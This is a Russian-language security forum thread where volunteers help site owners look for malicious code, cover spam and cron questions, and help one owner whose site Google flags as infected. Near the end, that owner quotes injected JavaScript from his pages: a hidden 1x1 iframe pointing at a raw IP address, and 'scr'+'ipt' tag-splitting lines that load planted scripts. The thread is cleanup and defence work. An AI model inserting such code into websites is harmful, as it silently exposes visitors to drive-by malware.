Проверить сайт на наличие вирусов, все просьбы о проверке оставляйте в этой теме

Тема в разделе "Анализ сайтов на наличие вирусов", создана пользователем akok, 19 янв 2009.

Статус темы:
Закрыта.
  1. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.791
    Симпатии:
    14.121
    Нашим ресурсом оказываются услуги по проверке интернет ресурсов на наличие вредоносного кода.

    Прошу учесть, что помощь оказывается добровольцами и поэтому не требуйте немедленной помощи. Вам обязательно окажут помощь.

    Если вы хотите проверить сайт на вирусы, то выполните простые правила оформления запроса:
    1. Администрация имеет право отказать в проверке, в случае, если проверяемый ресурс нарушает законодательство или правила данного ресурса (варез, хакерская тематика, материалы порнографического характера).
    2. Никогда не публикуйте активных ссылок. (заменяйте http на хттп, например http://safezone.cc - нужно писать как хттп://safezone.cc)
    3. Не прикрепляйте файлы, которые предлагают вам скачать подозреваемые сайты. (Просто укажите имя файла, который пытается загрузится).
    4. Если Вы подозреваете, что после посещения подозрительного сайта Ваш компьютер подвергся заражению, то лучше выполнить правила оформления запроса.

    *Мы не можем гарантировать 100% результат анализа. Слишком много факторов которых невозможно учесть.
     
    5 пользователям это понравилось.
  2. regist
    Оффлайн

    regist гоняюсь за туманом Ассоциация VN/VIP VIP Разработчик

    Сообщения:
    11.474
    Симпатии:
    5.296
    у меня нет фейсбука и никогда не было :p, но иногда приходят сообщения от него. Уже точно не помню, но кажется, что кто-то там меня хочет в друзья добавить :rolleyes:
     
  3. shestale
    Оффлайн

    shestale Ассоциация VN/VIP Преподаватель

    Сообщения:
    8.475
    Симпатии:
    4.666
    Dragokas, есть один детект у Norman на Redirector.KV, больше пока ни чего сказать не могу, так как сегодня у меня с интернетом проблемы...на страничке есть ссылки на .js, скачай и посмотри, ты же в них разбираешься ;)
     
  4. orderman
    Оффлайн

    orderman Активный пользователь

    Сообщения:
    1.159
    Симпатии:
    1.396
    regist, если не ошибаюсь, то на фейсбуке есть возможность пригласить друзей используя адресную книгу почтового ящика. Так что если у кого-то из друзей есть ваш адрес, то от него и письмо;)
     
    machito нравится это.
  5. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.791
    Симпатии:
    14.121
    Тут может быть все, от банального фишинга, до "упаривания" зловреда.
     
  6. Phoenix
    Оффлайн

    Phoenix Активный пользователь

    Сообщения:
    1.968
    Симпатии:
    1.938
    Dragokas,конечный сайт - hттp://postila.ru/ ,ваша ссылка это реферал (имхо но твёрдое :)) то есть, если товары купят (или что там) по этой ссылке, то хозяину реферала бонус.
    Кстати, вы уже видели новый сервис http://vms.drweb.com/online/ (только не смейтесь, проверьте ссылку, сервис классный ;))
    перенаправляет на
    hттp://postila.ru/user/lp/m/хххххххххххххххххххххххххххх/h/b69741837863417d3dffdg61e97f7?email=2c930afa59bdgdg9db2c441cac4516ed5

    (hттp://my.mail.ru/mail/хххххххххххххх - существует)
    Я подставил мёртвый адрес и редиректнулся.
     
    Последнее редактирование модератором: 3 ноя 2013
    machito и Dragokas нравится это.
  7. regist
    Оффлайн

    regist гоняюсь за туманом Ассоциация VN/VIP VIP Разработчик

    Сообщения:
    11.474
    Симпатии:
    5.296
    Phoenix, читаем шапку темы и не всталяем на форуме активные потенциально вредоносные ссылки!

    UPD
    . ссылки выше подправил убрав личную информацию.
     
    Последнее редактирование: 3 ноя 2013
    Phoenix нравится это.
  8. Dragokas
    Оффлайн

    Dragokas Very kind Developer Команда форума Супер-Модератор Разработчик Клуб переводчиков

    Сообщения:
    4.732
    Симпатии:
    4.528
    Phoenix, просьба также предварительно согласовывать выкладывание в открытый доступ дешифрованных персональных данных.
    Спасибо.
     
    Phoenix нравится это.
  9. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.906
    Это немного не так. Там есть предлагаемая возможность пригласить друзей и абонентов, используя ваш адрес email, который был введен при регистрации на FB. С точки зрения тех.администрации это простой процесс создать аудиторию для себя лично и для созданных вами групп.
    Действует этот так. Предложение "Пригласите друзей, используя email" вылезает очень часто, кто-то по незнанию или по осознанному желанию ответил на это предложение и ввел пароль от своей почты в предлагаемое поле. После этого FB автоматом авторизуется в его почте, считывает там адресную книгу — контакты адресатов и абонентов, которые вам присылали почту и получали её от вас.

    [​IMG] [​IMG] [​IMG]

    Не скажу, что FB самая защищенная сеть, но конфиденциальности там уделяется немало времени. Именно из-за этого FB довольно "туг на ухо". Но имеется возможность защищить свою учетную запись специальными решениями разработчиков средств безопасности. Это можно, например, сделать из программ Norton, или подключить специальное приложение Norton Safe Web, чтобы выполнялся Norton Auto-Scan.

    [​IMG] [​IMG]
     
    machito, Phoenix и Dragokas нравится это.
  10. SNS-amigo
    Оффлайн

    SNS-amigo SNS System Watch Freelance reporter

    Сообщения:
    5.219
    Симпатии:
    8.906
    Забыл сказать, что для того, чтобы подключить специальное приложение Norton Safe Web, не обязательно быть пользователем программ Нортон. Но именно это приложение действует наиболее эффективно в плане защиты и фильтрации спама. Потому у тебя нет ни спама, не левых поползновений и никто не жалуется на твою учетку, действующую самовольно.
    Вот страница самого приложения NSW в FB: https://apps.facebook.com/nortonsafeweb/
    А вот другие приложения (игры, календарь и пр. пр.) после подключения к вам получают монопольный доступ к вашему аккаунту и от вашего имени могут рассылать приглашения. Впрочем, так не только в FB, но только FB честно предупреждает об этом при добавлении приложения. В других соц.сетях этого предупреждения может и не быть, а суть та же, приложение будет надоедать и спамить за вас.
     
    Последнее редактирование: 4 ноя 2013
    Phoenix и machito нравится это.
  11. Ekliptika
    Оффлайн

    Ekliptika Пользователь

    Сообщения:
    2
    Симпатии:
    0
    Добрый день!

    Сегодня пришло на почту следующее письмо:
    Отправитель: "Voicemail" <admin@ledgo.ru>
    Тема: [VIRUS] Voicemail Message
    Дата: 18 ноября 2013 г., 13:04:11 GMT+4
    Получатель: maslov@ledgo.ru

    The attached message from Voicemail <admin@ledgo.ru>
    was found to contain the virus "Sanesecurity.Malware.22801.ZipHeur.UNOFFICIAL(7cc92d5b83b12 b9ddb82abd377e9f992:7106)".
    The infected portion of the message was removed by Virus Blocker.
    Значит ли это, что на сайте появился новый вирус?

    Сайт ledgo.ru.

    А еще постоянно (с интервалом 15 минут) приходят на почту письма такого содержания:
    Отправитель: root@bitrix118.timeweb.ru (Cron Daemon)
    Тема: Cron <talipov@bitrix118> /usr/local/bin/php /home/t/talipov/mega-shara/public_html/autobacup.php
    Дата: 15 ноября 2013 г., 13:15:01 GMT+4
    Получатель: ilgam@ledgo.ru

    Could not open input file: /home/t/talipov/mega-shara/public_html/autobacup.php
    Что это и как с этим бороться?
     
    Последнее редактирование: 18 ноя 2013
  12. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.791
    Симпатии:
    14.121
    Проверьте наличие файла, cron не может его найти и шлет ошибки.


    Не факт, проверьте, что рассылает форум. Срабатывание идет именно на почтовые сообщения.
     
    machito нравится это.
  13. S10
    Оффлайн

    S10 Активный пользователь

    Сообщения:
    23
    Симпатии:
    3
    Привет, друзья. Вновь обращаюсь к вам за подсказкой в поиске вредоносного кода...
    Гугл считает сайт зараженным. Помогите, плиз, отыскать заразу.
    Причём непонятно как вредоносный код мог попасть на сайт, если к сайту блокирован доступ по ФТП...

    Сайт хттп://rhl-mod.ru
     
  14. regist
    Оффлайн

    regist гоняюсь за туманом Ассоциация VN/VIP VIP Разработчик

    Сообщения:
    11.474
    Симпатии:
    5.296
    и считает, что вы распрастаряли зловредов, подробней тут.
     
  15. akok
    Оффлайн

    akok Команда форума Администратор

    Сообщения:
    12.791
    Симпатии:
    14.121
    shell отлично справляется
     
  16. S10
    Оффлайн

    S10 Активный пользователь

    Сообщения:
    23
    Симпатии:
    3
    regist, я всю эту информацию от гугла изучил и мне понятно, что сайт взломали с целью распространения чего-то вредоносного. Но вот на какие кокретно строки в коде идёт реакция от гугла? Надеюсь, что мне профи подскажут...
     
  17. regist
    Оффлайн

    regist гоняюсь за туманом Ассоциация VN/VIP VIP Разработчик

    Сообщения:
    11.474
    Симпатии:
    5.296
    S10 и shestale нравится это.
  18. S10
    Оффлайн

    S10 Активный пользователь

    Сообщения:
    23
    Симпатии:
    3
    Спасибо!
    Опять счётчик) Помню однажды этот счётчик меня уже подводил, но не думаю что только в счётчике дело, т.к Akok правильно предположил что на сайте может быть шелл.

    Сам я не бездействую ни в коем случае, у меня вот такая информация:
    В некоторые страницы и скрипты сайта в конец дописывали такую строку:
    document.write('<iframe src="хттп://5.63.152.144/?id=1" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>');

    Также вызывались ещё подсаженные js
    ;document.write("<scr"+"ipt src='/images/regimage/backgrounds/dbzgt.js'><"+"/script>");
    ;document.write("<scr"+"ipt src='/images/pagination/alley.js'><"+"/script>");
    Если надо - могу содержание этих js выложить, там много кода

    Сейчас я это вычистил, левые js удалил. Но я уверен что это всё появится снова. Найти шелл пока не получается, т.к ищу вручную, а файлов довольно много. Вирус судя по всему какой-то злостный, а я далеко не матёрый борец с вирусами)
     
    Последнее редактирование: 15 дек 2013
  19. shestale
    Оффлайн

    shestale Ассоциация VN/VIP Преподаватель

    Сообщения:
    8.475
    Симпатии:
    4.666
    S10, regist прав:
     
    Последнее редактирование: 15 дек 2013
    S10 нравится это.
  20. regist
    Оффлайн

    regist гоняюсь за туманом Ассоциация VN/VIP VIP Разработчик

    Сообщения:
    11.474
    Симпатии:
    5.296
    S10, ещё подозрительно что при попытке зайти на ваш сайт (хттп://rhl-mod.ru) подряд происходит два редиректа (сначала на rhl-mod.ru/content.php?s=f9cb94c2f7b20cb8d469af93737a3a95 потом на rhl-mod.ru/content) - .htaccess рекомендую проверить, а так никакого shell-a не заметил там.
     
    Последнее редактирование: 15 дек 2013
    shestale нравится это.
  21. S10
    Оффлайн

    S10 Активный пользователь

    Сообщения:
    23
    Симпатии:
    3
    Да, парни, счётчики я убрал пока что. Но это тоже тема для разговора почему собсно коды счётчиков заражаются... Это же лайвинтернет - безобидный сервис по идее... Второй раз такое со счётчиками. Причём в первом случае ругался только яндекс, теперь только гугл)
    ---------------
    regist, может содержимое хтакцесс прислать? Но в таком виде там такие редиректы не прописаны. Это обилие букв после content.php - это может быть какая-нибудь вирусоопасная зашифровка?
     
Статус темы:
Закрыта.